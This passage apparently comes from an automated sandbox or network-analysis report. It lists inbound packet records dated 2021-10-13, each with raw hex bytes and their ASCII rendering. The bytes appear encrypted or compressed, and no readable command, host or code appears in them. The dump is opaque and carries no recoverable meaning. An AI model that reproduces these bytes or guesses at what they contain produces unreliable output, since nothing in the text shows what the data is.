07 64 b8 3e 21 d4 1b Data Ascii: {k,Ry!RB~7,>]@(6@JL"(2p\z{F1{79B_Y{i%.GUtSJeJA^rgF]w~','l2:ihAO1+m6yDaA`XwF!o~XsM$a>MSX3@G,]9Y#d>!
2021-10-13 13:51:48 UTC	278	IN	Data Raw: c4 82 ec b4 23 08 36 5d d5 fc 67 d2 7c 52 24 9e 91 d3 c3 d2 b8 f8 a3 c1 9d b4 a5 10 f6 5d fd 6c 8c fc 0c a3 99 ab b0 8e 25 87 a0 36 d0 2e 9a 22 ad 97 65 15 c4 86 b3 de 23 36 4d f2 29 16 cd 34 0f 0e 8d 27 53 1a 0f 43 2d 6d 0e 51 3c 61 e4 6e df a9 21 1c 38 cf 61 e3 5b 9b b5 a3 bb d6 ff 52 14 2b d1 46 1b e9 7a d7 dd 37 c7 0f 88 b6 b5 a7 52 6d f2 4b f6 db 9c 6a b0 9d 66 2d 5b a8 df 09 c9 97 60 e7 42 79 26 fe 4f fb 36 94 1c 2d 33 b9 22 41 f6 34 60 13 23 2f c5 4c f3 83 fa 90 3b 9e fb 23 33 64 03 ac d0 af e4 18 58 e0 8f 67 33 25 e6 97 8c 5b 66 ce de 05 f4 3a 57 7f 05 1c d3 76 fc e8 97 65 c7 05 9f f5 3a 3b ca 1f ae 05 b7 9b 97 df 7f fb 5a 71 1b a6 63 f2 ea 7e 1a 87 43 08 03 7c f8 56 ea d2 7f 34 ab 56 1e c3 44 28 f2 32 ff 21 3c d5 c3 5d 2d 3c 9d 34 04 ad e4 28 12 Data Ascii: #6]g\|R$]l%6."e#6M)4'SC-mQ<an!8a[R+Fz7RmKjf-[`By&O6-3"A4`#/L;#3dXg3%[f:Wve:;Zqc~C\|V4VD(2!<]-<4(
2021-10-13 13:51:48 UTC	279	IN	Data Raw: 6e df 9a 09 f9 f7 07 eb a8 ee 6e c9 36 7d 7a 0c c8 e2 21 3c 2e 86 dd 32 7d cc 69 cc 4c 54 e8 2c 87 ff 52 c8 0c 72 20 26 b8 03 06 ee 2a c4 6f 55 ce 6a f3 bd bb f7 a6 ff 51 1a d2 0f 32 ee 55 3a 8e 99 99 9d 4c ed 09 57 04 ce 2e 70 0b 43 36 6f 2e c7 0e 22 4e 0e 53 d2 f1 ff 2b 6d b6 a5 36 1f 77 df be ca 9d 1b f7 93 df 43 55 47 85 84 2d 33 83 dd ad 20 0b 51 e4 bd 10 a5 14 02 ee b2 9c 46 63 eb b7 9a bd 92 02 5c 2d d2 f2 94 46 c6 39 aa 6c 73 74 b5 15 a8 95 f6 09 b9 0b 0b 21 ca 86 96 ad 78 56 bc 68 aa 68 7f f8 eb 29 2a eb d9 15 86 63 0b 11 e8 96 8f bb 66 b3 09 05 48 41 bf dc 47 d6 30 84 5d b1 97 c9 31 a4 4b 0b cb 61 3c bd e0 d5 35 44 f3 3a 50 e8 3c 91 9a c6 fe d6 02 51 f4 a3 ef bc 5e da e8 e2 62 5f 91 3e 6f 38 64 ca 2b 8c 56 07 93 aa e4 fc 81 e1 a7 03 fd bf 4d d1 Data Ascii: nn6}z!<.2}iLT,Rr &oUjQ2U:LW.pC6o."NS+m6wCUG-3 QFc\-F9lst!xVhh)cfHAG0]1Ka<5D:P<Q^b_>o8d+VM
2021-10-13 13:51:48 UTC	280	IN	Data Raw: f2 07 10 cf 8b bb 10 e6 dd e8 c7 88 82 49 7f 1f ae 65 c1 f9 fb 53 55 7c d4 e0 ed 2b 9d a9 c5 7a c9 5b 5e 23 72 35 5c 49 63 f8 71 98 0c 48 ea 2f 3d 2a 57 35 49 75 d3 2c d1 d6 a0 2a 1e 47 63 5c 87 9e 3f 31 34 31 bc 4e 92 52 5f 2b 0c c3 a0 a9 85 3c 5f 12 12 0e 56 38 54 0f d6 12 1c 16 24 6f 5c d2 a8 c4 c7 b5 b8 fd f4 b9 ba b2 b4 d2 9e 16 ae 20 66 47 c7 c4 27 50 d8 9c 29 f3 6c d8 68 4f fb b7 fd 32 29 71 44 8c c5 c2 14 27 90 87 30 dd 39 e5 8f 2b 17 41 67 09 c1 fc a5 11 4c 42 7e f6 85 77 0b f9 5f 65 f0 87 07 be cc 84 c4 d0 86 c5 a1 6c f4 ac ec a1 13 df 52 7a 0b 2d 52 83 86 a4 4c 83 83 20 0a 17 82 c8 2e c9 04 a4 5f f8 50 6d 09 dd a1 7b 39 f3 79 e6 29 4d d9 11 27 d2 e0 e8 6d 98 d6 df 13 02 e2 3a 2e 6e a5 9b 0b f6 a1 6f 9f db 38 2f 29 bb 71 5d db e3 bf e9 99 69 9d Data Ascii: IeSU\|+z[^#r5\IcqH/=W5Iu,Gc\?141NR_+<_V8T$o\ fG'P)lhO2)qD'09+AgLB~w_elRz-RL ._Pm{9y)M'm:.no8/)q]i
2021-10-13 13:51:48 UTC	282	IN	Data Raw: c9 12 08 be 7f e0 06 fe 20 47 fd bf 4d d5 6d f9 8a ea 46 38 fe 09 9c 77 cd c5 b2 7c 80 0a ef 04 ba 9b 73 a2 2a 43 f1 34 4b de 66 33 cb 82 0f b3 b5 08 98 5a 84 67 21 12 a8 1d e2 85 07 9d d7 54 8f 46 2f 86 2c a1 06 01 8a 40 e9 47 8c 81 dc 43 1a d4 6f da 52 49 c9 4d ef 6a a0 62 4e 43 9a 7b 63 e7 19 24 11 d0 5d db d2 5e d9 60 ce f2 30 93 72 94 ca 32 2a 68 44 a7 37 02 4f a6 f4 62 63 f3 6e a8 71 d7 e6 9a 7a c4 58 82 31 75 40 1a 08 92 d5 51 1a ae 1e f4 62 c7 6e e4 34 23 25 ba fc 46 0a 9c 88 01 f1 16 a4 7e ab 64 fb 36 a8 48 67 30 41 3b a2 cd 5d f6 90 94 56 41 c1 99 66 bf 64 e2 ae 66 15 92 e6 bc fa 8a c3 d2 19 5b 0c 8e 8f 42 21 0e 70 26 6d e5 89 0a ac 5d 10 1b 7f a5 59 9b 90 70 00 7d 57 16 74 e4 ef f3 4e 3f b5 2d d0 d0 f5 8f 14 c7 73 14 ac 94 fc ca d7 77 8f da 80 Data Ascii: GMmF8w\|sC4Kf3Zg!TF/,@GCoRIMjbNC{c$]^`0r2hD7ObcnqzX1u@Qbn4#%F~d6Hg0A;]VAfdf[B!p&m]Yp}WtN?-sw
2021-10-13 13:51:48 UTC	283	IN	Data Raw: 0e 53 51 e2 17 fb 9d 10 a3 9c 38 cc 88 71 6c 1b 09 f2 1b b2 96 4f 39 57 d7 be 41 da 41 b2 e3 98 53 de 90 2a 8f 96 7a 37 67 48 f3 74 74 09 9f 2c 87 36 bb 86 89 6b d3 4c f4 24 5b 26 95 0e 54 e8 3c bd 74 7d dc 0d a8 3f de 55 23 ac 1d f9 8b 7d 8d 9a cb 7e 20 da b1 ef 1e 3a 77 ba bc 89 42 69 63 2a d9 a9 47 11 55 25 51 25 e2 a5 b8 d1 ea 76 a0 44 d3 6f ef 7d ee 52 a0 03 f7 26 46 b5 0e be 21 91 11 55 7d 81 62 74 22 3f ea 85 06 5c e3 fb cb df 05 63 6d 52 57 ec 45 11 7e ea be b5 4d 4e 9b fa 20 fe 96 9c 4d 65 82 90 8d c6 dd 56 90 53 3e c9 15 1e 72 a3 c7 db a0 b7 c7 5b e3 05 4f c3 62 ad 65 4a 34 e3 3d 77 2b e0 69 ed 3e 34 d6 59 6a 33 80 54 73 8f 08 7d 2f ed d0 9e 0c 11 12 0d d2 da 1b 3d 9c e4 1c ae ff 19 4c 37 cb 77 2d 54 04 b3 b6 d3 56 b1 89 96 f9 cf 93 cd 9d d7 52 Data Ascii: SQ8qlO9WAASz7gHtt,6kL$[&T<t}?U#}~ :wBicGU%Q%vDo}R&F!U}bt"?\cmRWE~MN MeVS>r[ObeJ4=w+i>4Yj3Ts}/=L7w-TVR
2021-10-13 13:51:48 UTC	284	IN	Data Raw: 59 32 a9 70 c1 61 69 fe 57 79 5e ae 69 4e 1e dd 60 63 7c 15 4b 4b 93 b7 cc 0b 50 1f 65 9d 61 7f ef a2 73 81 a1 5f 3d cc 46 fa fe 77 fe db 4b de 6c 2c 28 b6 b1 eb 05 3f c5 fb 18 37 e6 21 48 8c 86 42 70 06 40 83 c0 d9 b6 9c 8c ea 6d 51 5c 15 79 a0 e0 93 aa 4d ce d1 72 69 3b be 7b 4c 3b 77 0a 5f 9d 08 05 0f e1 f0 6c bd ab b9 42 6a 88 12 a9 25 69 17 d1 44 68 63 55 b5 ea da 5c 9d 56 af d2 e9 35 ff 79 08 50 33 b8 73 67 e7 31 a1 8f fd 98 d3 1b 8d 96 53 33 73 ce f1 5a 66 ff 1d 0e 47 f7 7e e2 b5 2f b2 cb af 54 c3 c3 45 aa 48 f4 3d dd 39 3e 5a 56 fd b7 98 63 4a f9 77 1f 9d ac 0a 44 89 1c 32 e5 0d ee 6d 9a 5a 2b 13 8b 14 86 39 8b 81 d8 29 9f 1b 30 43 0a e1 77 5a 6a ef 0a 9e d1 f6 00 45 78 70 51 b9 70 11 51 07 c1 9c 8d a3 92 84 ce 69 c3 05 c1 78 19 5d 95 80 02 33 4f Data Ascii: Y2paiWy^iN`c\|KKPeas_=FwKl,(?7!HBp@mQ\yMri;{L;w_lBj%iDhcU\V5yP3sg1S3sZfG~/TEH=9>ZVcJwD2mZ+9)0CwZjExpQpQix]3O
2021-10-13 13:51:48 UTC	286	IN	Data Raw: d5 35 45 b9 0f 1c 17 c3 6e cc 96 16 32 e7 cb f0 28 ba 11 58 f3 07 96 d0 16 fa 34 95 94 10 1c fb cc 59 82 f7 db d7 b0 8d b3 2c 98 38 82 41 fc cc 20 e6 32 d9 f6 c1 a8 9e 17 f0 fb e6 ab cc db 3c a3 bc d7 d6 78 f2 4d 71 44 58 35 87 76 93 e1 16 4b 1c 7a 56 72 dd 06 6c 29 2d 49 21 6d 1a 29 ee ee e6 ce 2f fb 0c 8e 62 12 27 da 04 e7 4f f7 e8 d2 6f 18 3d 57 ba fe d2 5e c0 93 4e 72 39 af f3 76 df e5 19 af 74 05 aa 10 3f 0c af 7b 45 3a a9 54 c2 73 be 34 6e b1 52 aa da ac 3b 03 f3 34 33 a2 12 ba 23 b4 00 23 47 08 13 2c 81 63 12 5d e5 f0 7b 71 54 6c 5f ff 8c 44 d5 7d 01 66 ad 33 ac 5d d9 91 c5 ed a0 2e 39 43 82 9d aa bb a8 30 f2 b2 e8 82 cc b9 39 30 12 21 d0 2f a4 ec a1 3d d5 48 ca 07 70 55 2a 19 40 0b 90 b4 df 1e 73 08 47 36 25 0e b9 20 1d 22 1e 4a c1 85 91 f3 0b b3 Data Ascii: 5En2(X4Y,8A 2<xMqDX5vKzVrl)-I!m)/b'Oo=W^Nr9vt?{E:Ts4nR;43##G,c]{qTl_D}f3].9C090!/=HpU*@sG6% "J
2021-10-13 13:51:48 UTC	287	IN	Data Raw: 5e 02 ac 7f 64 8e 85 0e ea fe 32 65 51 0b e8 61 79 20 d3 b7 4a ba 26 51 be 9e e3 07 6d e4 72 a7 4c 06 88 e7 12 63 e1 4b 9e 80 0c db 81 1e 17 06 0e e7 76 cd c4 24 c0 ce 90 d5 ff 23 0e 49 7d b5 7e f2 08 dc 46 08 78 1b 0b eb a8 93 e8 22 53 19 52 81 c7 a2 c9 49 94 59 07 2f 89 4a 52 27 e1 54 f8 e4 5c 39 db df 9b 74 38 ce b8 03 44 88 3a c6 2c f4 11 d0 d7 b3 6f 79 67 01 65 bf ea bb 55 46 33 cb d9 70 a1 f6 3d e3 25 a4 d4 f5 6c bd db 1a c8 b0 cf 06 da 6f 8a 9e d4 87 1d 22 3e 79 dd 1c 7c 19 7f e7 92 69 98 84 bf f6 4e 85 6d 68 16 7d f0 78 8d ee e9 30 5a da f2 3a a7 73 c1 31 6e 68 ce c1 79 a9 2e dd 04 92 ab df e3 92 71 8a 01 1b 2e b9 51 19 25 69 f5 5c b1 10 f6 10 d0 13 86 00 96 13 d0 59 64 b2 d2 c2 ed 65 8a 68 bb d6 1b ac bf 6d b0 44 58 73 01 5b a8 37 22 f0 3e 1e 44 Data Ascii: ^d2eQay J&QmrLcKv$#I}~Fx"SRIY/JR'T\9t8D:,oygeUF3p=%lo">y\|iNmh}x0Z:s1nhy.q.Q%i\YdehmDXs[7">D
2021-10-13 13:51:48 UTC	288	IN	Data Raw: d9 cd 29 28 73 1f 84 5b 3b 08 b6 c1 a1 6b ad b1 c5 64 75 57 cc 53 eb a1 1d dd 97 62 56 fb 70 24 2b 13 a2 08 38 0f 2f fc ad 0b 79 7a 32 4a 29 c3 d9 c2 c0 af 8d dc 4b ae 11 df fc 01 48 c0 de 6b 4c 2d 63 11 cc a2 17 4d fb 15 a7 04 a1 75 63 e9 a1 97 b9 bf bd 76 e6 c2 db 91 d8 fa 1d be 2d 3f b6 f1 c4 19 0e 35 89 b7 49 55 e8 53 16 28 8b 29 9d e9 ec 68 73 33 90 2f 47 ca 86 6e 64 f0 9d 9d 4c fd dd 5d bc e8 96 e4 0b eb 4c d3 62 dc 6c 83 94 3a c6 f7 c2 5c fc 2b d4 30 a1 0b d2 14 40 f1 7d 63 6f 44 ae a7 f6 b4 de c4 7d 98 b8 b2 3b 54 1c 90 21 d4 32 73 14 07 b4 0e 08 53 a7 4a c9 60 44 a2 87 bd 02 6f b4 bc 2e b8 af c2 05 cc a3 cb 7e dd 4c 4b 19 c7 33 48 39 54 89 21 b5 aa 57 0f 36 a8 d6 74 73 f7 f2 2b 58 32 39 07 4b 51 75 45 26 00 72 ad 7d 20 fb 45 4b 8e ac 46 d1 b1 d1 Data Ascii: )(s[;kduWSbVp$+8/yz2J)KHkL-cMucv-?5IUS()hs3/GndL]Lbl:\+0@}coD};T!2sSJ`Do.~LK3H9T!W6ts+X29KQuE&r} EKF
2021-10-13 13:51:48 UTC	289	IN	Data Raw: 92 db de a1 07 38 0b 41 7c 62 46 1f 2b d0 26 8b cb ff e5 c3 5f 6e 15 ad 36 e4 bf 7e 7c 8e 2a b1 43 83 73 15 f3 86 36 91 d0 a2 0c f0 93 e0 7b 5d 79 4c 9e 9c 95 f9 77 55 69 47 67 02 f0 27 e3 12 aa 20 23 bd 7c a9 e4 e4 85 75 a8 10 51 10 4d fc 33 f9 2a a7 d5 5a 6c bf 9f 6c 6f f9 9a 90 34 1f 56 b8 1e 97 47 f7 93 49 f1 db a6 ca ed 25 95 61 5c a6 e3 85 58 33 40 cb 53 5d a2 14 b2 43 d4 59 ee ee 9c 0e b3 29 a8 99 bc 7a 94 29 0c 56 43 af e1 1c 15 a8 97 49 26 f5 fe b3 1e bf 98 d8 4d 13 9a a5 93 18 e6 22 6a cb c8 23 81 77 53 84 2f a7 af de 17 01 14 ff 68 6a 27 a5 ca ad 3b 66 bd a8 63 4a 9f 93 d1 a3 8e 8a 21 a6 15 49 2e 6e e2 26 1b fd 29 99 c1 1f b5 80 04 d9 16 0e 40 99 a6 44 bc d1 98 29 41 36 d4 5f a3 0d 42 f8 6f c8 01 e7 2b bb 26 8d aa 21 7a 57 5c 65 ae 2d 27 2c a3 Data Ascii: 8A\|bF+&_n6~\|Cs6{]yLwUiGg' #\|uQM3Zllo4VGI%a\X3@S]CY)z)VCI&M"j#wS/hj';fcJ!I.n&)@D)A6_Bo+&!zW\e-',
2021-10-13 13:51:48 UTC	290	IN	Data Raw: 0a 61 43 ff 89 9d 56 d0 84 a9 27 1f bb b6 e0 57 15 24 a9 6f bb de f4 8c da bb 61 b8 14 73 e9 18 a4 1c 80 32 f2 9c 68 22 c0 3f a0 f2 eb 33 95 9e 60 4e b8 5d f6 92 be d5 b4 aa 97 52 1e 09 0a 7c ec 2b d0 c3 ca 15 b3 f5 3c 96 a4 9c 19 bc e1 36 79 08 2c 62 97 90 e9 66 fd d9 7b 8f 1b bf 55 c0 a5 e9 b2 34 51 80 2f fd 1c e9 80 f4 1c d6 74 e4 7a 06 8a ef eb 37 9a 5d 3e b6 1b 6f c4 75 36 da 61 bc b8 3f 4e d3 ff 6b a8 d4 5b d6 93 e6 6d 6f 85 dd 58 27 b6 82 9b 47 4a 12 c4 7e c8 1d b7 fc 94 66 93 9e ca 8a bf 2d 99 c6 48 ae 0c 3f 95 2b 11 86 e0 e5 98 9b fd 35 85 2e e2 d9 90 37 b4 59 1b 87 57 0b 97 a3 4c 73 f2 91 60 1f 3a eb 3a c8 7b 8e 79 43 bc 8d 11 28 e3 4f fe cf 47 61 34 a8 9b 6d f8 81 a7 14 1e 4b 8b 01 e7 02 08 cf 97 de de d0 eb 9e b9 6c a0 f7 f7 38 03 58 7f b8 f7 Data Ascii: aCV'W$oas2h"?3`N]R\|+<6y,bf{U4Q/tz7]>ou6a?Nk[moX'GJ~f-H?+5.7YWLs`::{yC(OGa4mKl8X
2021-10-13 13:51:48 UTC	291	IN	Data Raw: 1a bc fd 5f 01 04 cb ba 28 f1 dc 7a ed 00 ae c2 45 aa 7e 7c d9 80 fa 19 8f d8 f0 26 32 82 a6 f8 32 e7 1d 52 7e fe 81 7d 8a 11 79 e8 65 17 5e c8 5b 26 cf 44 26 08 6e 14 8d 4e 07 3c 4c 8c f4 32 c2 3a 54 85 35 27 84 10 08 68 1a 41 63 be 40 42 5e a2 ba 70 0c 6e c6 da a3 7b 73 14 86 19 21 dc c1 1f a2 b7 7b e3 e2 d8 1e f0 36 8d 86 b4 24 ce 29 4e b3 68 c4 23 17 2e 30 7b ce f8 07 c9 d4 ee d8 26 9a d1 87 04 7e 97 55 33 8e 61 c3 4a 48 38 3c df f0 50 7e 29 e5 77 8f 8c cf 0f 0c ef 5a e8 7f ea 6e c9 d6 9c 85 f3 c0 73 09 32 ab d3 1e f4 34 5b ae 2e 11 68 e1 c6 c7 ff 53 2e 51 74 19 c4 ee 03 26 ea 29 4c ae 54 ca 7d 3d 0f 19 cb 42 67 ab 8b b7 da cb c8 6a 22 78 d4 7d 6c 92 83 b8 1f ca 95 59 68 90 50 50 72 93 95 0f 47 f2 f9 a0 2d 72 6d 77 00 12 de 8e 94 b1 9e d8 c2 1b 17 47 Data Ascii: _(zE~\|&22R~}ye^[&D&nN<L2:T5'hAc@B^pn{s!{6$)Nh#.0{&~U3aJH8<P~)wZns24[.hS.Qt&)LT}=Bgj"x}lYhPPrG-rmwG
2021-10-13 13:51:48 UTC	293	IN	Data Raw: c8 1b 62 ca be 97 56 41 86 e5 87 d2 bb e0 38 3c 93 ad f2 d1 a5 e5 fa b8 02 cf 99 cc 95 59 59 38 ba 29 77 82 b8 3b 69 7a 3c e0 c7 bd a7 ce cf 77 e6 1a c5 ac 41 f5 70 52 f9 2c c6 4f 03 77 19 b2 b7 5f 17 a8 e4 24 d8 02 05 9d f2 e2 4b 22 a1 e6 e4 fd 71 73 05 f5 29 76 0f 2d 32 43 32 02 8a 89 74 62 f4 e0 42 2d 66 4d 89 52 5f 6b 1f 47 fa fe 16 62 4e 1f 89 a7 91 36 bb 42 fe 40 a2 7c 63 ef d9 1d 5f 8a 16 fb f7 5f ea 2d 9b 76 c9 a5 ca 09 06 35 f5 e3 c3 fd 7a 09 2c 2a c4 9e 5d 41 cf 32 40 11 d1 cd de ce aa 54 fe 94 40 0c 82 bd ba 6b da 19 be 5a ec d4 e2 ef b8 65 8e 0b e3 36 7d fd eb d5 70 2e bc 63 a1 5e 0e bc 02 51 73 f1 47 05 08 da a0 b1 69 39 4f d4 ba c7 c3 8d 99 b8 09 0a 01 e4 6c 1f a9 11 5e a3 3d b9 7f f0 bc 7a 09 19 0a c9 95 90 27 9b d6 90 a3 9d f5 57 07 c0 1a Data Ascii: bVA8<YY8)w;iz<wApR,Ow_$K"qs)v-2C2tbB-fMR_kGbN6B@\|c__-v5z,*]A2@T@kZe6}p.c^QsGi9Ol^=z'W
2021-10-13 13:51:48 UTC	294	IN	Data Raw: aa f9 51 0f 6b 2b 1b 0e 6e 9b 36 e3 02 55 da f9 d9 90 56 d1 26 7c b7 c2 6b fb 20 73 de 22 8c 49 24 0c 7b b4 70 4b 6a ca 37 38 d6 3c e0 6b fa 6d f4 61 e0 1b 10 a0 4c c7 76 20 e3 9f 81 d8 bd 81 f2 a2 e4 9b b6 07 45 ab 7a 2c 67 ed a3 e9 35 9c 09 0c bf 77 c5 18 c5 61 b4 5e 79 26 03 e5 66 a9 42 1e 02 59 0c 04 47 a8 fe 4f 7b 11 04 e4 9f 3c 67 c4 89 b1 72 f2 c8 dd 95 a9 17 a7 19 81 42 92 04 9e 16 32 00 dd cc d2 45 63 bc b2 88 9d bc 6f 2a 29 7b 6a 2e 82 c2 14 d5 5c 88 7b b3 b9 4d 8e d5 80 2b 7e 24 c3 16 7a a7 bf 79 0c 31 d3 07 68 6f f9 9c 71 50 02 33 51 cb 49 a5 8d b7 c1 98 aa 1e ea f5 44 cc 8e a7 5e 1c 7a f6 8b a2 11 c1 c2 d8 29 30 8c 1f 0f 18 3c 00 f4 a2 42 9d 43 6d b9 0b 2c f9 75 bd 02 98 9a 4a 84 15 4f f3 ea f3 04 86 f9 6c 53 a0 53 67 a2 ac 17 a3 2e c4 7a a1 Data Ascii: Qk+n6UV&\|k s"I${pKj78<kmaLv Ez,g5wa^y&fBYGO{<grB2Eco*){j.\{M+~$zy1hoqP3QID^z)0<BCm,uJOlSSg.z
2021-10-13 13:51:48 UTC	295	IN	Data Raw: b3 c1 71 f1 fb e4 74 b3 90 29 ac 72 5a a3 e8 6e 43 1d d2 fe 57 84 ed d2 1b c8 6c 51 c0 3a 85 98 85 0f 71 48 7a 91 29 49 6f 53 75 b8 5d db 47 50 c1 60 db 31 e4 32 c7 1c 31 0d b3 6d 47 e0 61 bf 56 4e 1d 2c 25 58 5a 7f fb 4a b1 f8 11 19 ec 6b 34 00 54 95 11 88 fd f1 63 a1 b6 55 bd 61 18 26 ff 97 08 02 da 3f 75 fc 34 3d ed db dd f0 e0 7e 56 8d 0d 6f 43 5e ec e5 37 79 bf e1 7a 9f 59 16 de 22 95 ef e0 9e 5a 9e 72 3f b6 bd 01 5c f5 0d 91 77 33 91 35 bc 41 1d b3 4b a7 8f d8 80 13 5f 9e aa b4 fd e7 84 b9 0d c1 36 9d 53 e1 80 e6 8a 53 41 f2 94 28 d6 91 22 91 f0 20 34 ed 7c 9f 11 a5 31 87 e6 21 82 fa 47 05 b8 c1 c4 e0 63 83 4c 5a ae 2f a2 52 cf 2b 42 cb fe 79 6d 74 4a 29 ec c7 71 1f 9f cc f5 4a 62 2f 61 9b 29 c6 1f 78 c3 06 33 7a 57 8c a8 e9 fa 2b 29 d1 76 fe 98 b8 Data Ascii: qt)rZnCWlQ:qHz)IoSu]GP`121mGaVN,%XZJk4TcUa&?u4=~VoC^7yzY"Zr?\w35AK_6SSA(" 4\|1!GcLZ/R+BymtJ)qJb/a)x3zW+)v
2021-10-13 13:51:48 UTC	296	IN	Data Raw: 86 99 12 37 a0 8e 5a df e8 2b 06 64 ac ac 05 84 cc 0a 59 70 03 b4 66 50 1c 70 6a f6 eb 96 eb 1c 4e 5f 73 1c 21 22 9f 0c 79 76 00 83 18 6b 48 93 2e 55 1a 12 5d 28 00 84 8e ac ff 3f 44 0f ce 1b fb 8a 8a 48 9b eb d3 8f 04 d9 47 7b 84 24 6c 60 b7 b6 fe ae 92 b5 bc f7 0a 8b 0b 88 b4 e0 8b 06 87 09 6a 84 7f 73 4c 0b 24 7c 4c cc 91 08 b9 2e 46 23 bf e1 82 7d 1e 2d f1 8f 51 7a 7b 22 73 40 0f 32 85 c1 65 94 6a 3f a5 ae bd 0c 45 ed a4 15 60 0c 4f 6f fb 7b 4f 17 9b cf d9 41 7f b9 9e b2 14 3c e2 28 47 bb bd 2a 1b 37 78 f3 0e 40 4e 39 d1 89 ae 94 31 39 9d 79 07 c7 38 e4 67 cc 23 a2 17 36 3f fb 78 9a d1 bb 99 e7 67 0f ad f0 00 08 74 d5 82 ac 8b 9e c7 59 80 08 00 3b 0f 79 78 9b 42 c5 77 ec 31 4f 7f 64 c1 e5 ab 9c e3 48 a5 45 c8 81 5d a6 7b 14 7b e6 89 36 9c 60 b0 8b 2a Data Ascii: 7Z+dYpfPpjN_s!"yvkH.U](?DHG{$l`jsL$\|L.F#}-Qz{"s@2ej?E`Oo{OA<(G7x@N919y8g#6?xgtY;yxBw1OdHE]{{6`
2021-10-13 13:51:48 UTC	298	IN	Data Raw: 3d 55 f3 56 46 25 f6 0d 89 cb ef 5a 92 d7 2f 0c ce c3 5a 23 64 03 7f 4c 7e 40 7a 02 3d fe 5f d2 f1 a9 23 46 87 20 da 9e 1f 35 55 4e 78 34 41 e3 4e 97 8d 92 c2 12 8d 84 60 79 d0 05 f8 94 33 34 4a 2b e2 98 e8 df 42 1b fd c0 7b 56 e8 19 b6 14 3d 51 95 54 4b 98 6a 0d f1 58 10 17 be fb 22 37 2c 66 05 3b 6f 0e 87 8b f8 5b f0 8b ec a3 fb 4a 4e 69 a7 fd 51 52 40 92 33 d8 97 ad 4c e8 37 7f ff a0 d2 ca 74 53 2b 1a 39 60 5d de 24 39 f2 f1 56 05 e6 13 0b 82 dc c5 c5 62 31 7c 48 37 29 ff 79 cc 96 16 32 57 92 a1 a3 56 19 e8 81 2c 0e 0e 06 ac 41 c9 b0 52 16 32 1d 0a c5 be 0c ae 5b 4a 3f ef 52 f6 c7 bf bb cc 25 83 85 b0 ef 0f 06 c9 d7 8a 1b aa cf d0 eb c4 78 ae e8 ae 70 ff 01 d4 af 82 78 00 13 a2 8e 52 76 b6 1e 9f 37 36 df e5 b6 d7 3e e7 4c f9 cd 73 44 25 0c 4e 50 b5 c9 Data Ascii: =UVF%Z/Z#dL~@z=_#F 5UNx4AN`y34J+B{V=QTKjX"7,f;o[JNiQR@3L7tS+9`]$9Vb1\|H7)y2WV,AR2[J?R%xpxRv76>LsD%NP
2021-10-13 13:51:48 UTC	299	IN	Data Raw: 8d 20 9d 5e 61 d8 c5 1d 88 d4 40 04 cf af ff 02 a0 68 01 25 b3 c9 b1 dc bf cb 28 11 19 55 e8 ac c8 d1 78 aa 6e 88 ae 53 9d b9 db 39 44 e1 b2 c4 5a dd bf b5 46 5f fb dd 69 d2 55 9e ba fa a8 11 9c db d0 bf ae 87 38 41 8b 78 f3 77 4b 1c 33 df 32 fc 50 6a 2d 0e 90 b2 f1 fa ef ee d4 a1 ae cd 0f 91 a4 9a 9e ae 48 9b 8c d0 01 2d 9b bd e9 5a 0c bd e1 25 f0 26 d0 d4 77 74 c9 8f 70 38 56 8b db 83 1a 11 12 33 fb 02 11 4a 2d 5e 96 25 13 50 b3 08 38 de 7b 9d 75 48 fa 1d 61 2b d6 de 76 c5 98 bf e7 8f ab 05 56 57 7a 16 f8 7a b2 86 fb e7 65 6d 88 3a 3f 38 7a 54 a3 6d ea c8 49 e8 5c 35 78 38 0c 71 1e fb 6c 1e be fc c3 9b 40 76 44 92 ba db 8c d0 e0 5e 55 91 2d 8e ff 20 34 09 6c 90 40 f7 1a 50 d8 da 7d 8c 8d ce ab 42 9f e2 48 a3 34 f8 95 6c a7 e5 2e 8a a0 0d 53 41 9d d8 62 Data Ascii: ^a@h%(UxnS9DZF_iU8AxwK32Pj-H-Z%&wtp8V3J-^%P8{uHa+vVWzzem:?8zTmI\5x8ql@vD^U- 4l@P}BH4l.SAb
2021-10-13 13:51:48 UTC	300	IN	Data Raw: d6 6b f8 99 f4 cc 9a cd d4 f3 75 81 20 91 c3 56 9f 2e c4 57 35 ae 38 52 02 46 b3 af de 51 0c 58 1d a5 09 4b 7f 9f c0 9c 12 9b 19 6a 1c 21 27 2c b0 46 b2 26 b1 9b a7 87 08 ad 15 99 ba a1 27 8e 92 84 3b a6 88 70 03 be 15 a4 0d c7 7f fc de bb 4d fa f9 ed 7a 4a 0a 08 89 be 3b 94 9d 37 4c c8 be 5a c1 5a 2b d2 a5 1b 65 6b 5f 33 42 9c a6 30 b2 05 41 f4 91 95 2c 67 89 9e 20 2b 17 42 7e 81 47 87 f7 1c e2 da 76 42 06 57 15 8e 56 72 8c fd 1c b3 49 fd 7a ff f0 50 98 34 72 e3 f6 0a 48 5c 55 ce 5c 45 41 c1 34 fe 77 1f eb e4 b8 53 97 1d 48 03 5b da 42 41 4a 3d 94 6c ea 5a 0d 98 c5 8c 05 3f 83 f0 e9 17 48 ff 67 de 6d cf 61 b5 be ab 0f e8 80 07 39 c2 91 91 b7 ce 97 98 61 07 b0 b3 3d da c0 a3 6a 78 95 51 d0 04 da 21 71 0a b8 e8 69 36 a4 19 59 a3 15 aa 16 52 1c 95 bb 41 70 Data Ascii: ku V.W58RFQXKj!',F&';pMzJ;7LZZ+ek_3B0A,g +B~GvBWVrIzP4rH\U\EA4wSH[BAJ=lZ?Hgma9a=jxQ!qi6YRAp
2021-10-13 13:51:48 UTC	302	IN	Data Raw: 48 42 8d ea 63 5b b6 57 1c 6f 0a f3 f0 59 ce 66 d1 ad 8e c6 2a 82 59 9e 93 06 ee eb 5b 81 43 6c 1e ea 34 c6 5c b7 9f 46 05 6f e8 62 4b 72 d4 cd 3f d1 67 0e a5 89 f4 1d 50 6a db 99 cb d3 da 73 ff 25 48 45 86 de e6 8b a4 16 51 47 2b c9 dd d7 48 36 74 c6 a7 75 69 ed 68 44 42 a9 bd ef 36 2a a1 6d 91 f7 11 4b 76 ca e2 22 f6 83 0b 82 ce 6d 34 c3 51 e9 74 58 98 27 29 5e c0 8b fe 9d f9 ac a4 ab f9 78 2f 7f 86 a6 29 01 c6 55 34 b8 4d 6c 61 1b eb e6 bd bd bb 49 4c b1 39 44 fa 7e 5d 00 c0 54 15 da bc 9e 39 25 93 69 ee 2d cd 89 99 81 ed f3 99 4c a0 ef a1 74 ef 3d 8b c0 32 dc 28 23 42 f1 a5 ee 25 7d 2e 9d 23 9e 85 99 eb 23 78 06 cf dc 34 a9 ac 75 05 ec eb 8f ef be ed ee d9 3a e7 87 ee ba f2 d8 40 